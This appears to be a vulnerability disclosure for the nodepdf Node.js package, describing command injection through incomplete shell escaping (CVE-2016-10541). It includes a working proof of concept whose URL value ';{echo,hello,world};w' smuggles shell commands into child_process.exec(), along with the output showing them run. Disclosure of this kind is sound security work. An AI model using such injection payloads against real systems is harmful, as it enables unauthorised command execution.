Software: nodepdf
Website: https://github.com/TJkrusinski/NodePDF
Input passed to the Pdf() function is shell escaped and passed to child_process.exec() during PDF rendering. However, the shell escape does not properly encode all special characters, namely, semicolon and curly braces. This can be abused to achieve command execution.
This vulnerability was later fixed in the shell-escape library and assigned the identifier CVE-2016-10541.
var nodepdf = require('nodepdf');
var url = ";{echo,hello,world};w";
var filename = "output.pdf";
var pdf = new nodepdf(url, filename, {});
pdf.on('stdout', console.log);
pdf.on('stderr', console.error);
$ npm install [email protected]
$ node render.js
11 incorrect args
hello world
03:31:25 up 19 days, 16 min, 1 user, load average: 0.15, 0.15, 0.10
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
user pts/0 192.168.1.64 02:38 0.00s 0.31s 0.00s w